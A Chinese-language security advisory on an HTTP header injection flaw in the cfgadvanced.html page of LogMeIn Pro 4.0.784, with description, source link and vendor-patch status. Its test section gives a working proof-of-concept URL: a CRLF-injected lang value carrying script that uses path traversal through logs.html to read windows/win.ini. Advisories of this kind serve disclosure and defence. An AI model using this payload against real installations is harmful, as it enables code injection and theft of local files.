LogMeIn cfgadvanced.html页面HTTP头注入漏洞

发表评论 (0) 查看评论

受影响系统:

LogMeIn, Inc. LogMeIn Pro 4.0.784

描述:

BUGTRAQ  ID: 35236

LogMeIn是流行的远程访问软件,允许通过网络控制计算机。

LogMeIn的cfgadvanced.html页面存在HTTP头注入漏洞。如果用户受骗跟随了恶意链接并收到了lang参数,LogMeIn会将lang参数值储存在[HKEY_LOCAL_MACHINE\SOFTWARE\LogMeIn\V5\Appearance\Language]注册表中,并在每次点击链接的时候在Content-Language头中使用,因此特制参数可能导致注入并执行任意代码。

<*来源:Inferno
  
  链接:http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://localhost:2002/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21–

建议:

厂商补丁:

LogMeIn, Inc.
————-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://secure.logmein.com/home.asp?lang=en

发表评论?

0 条评论。

发表评论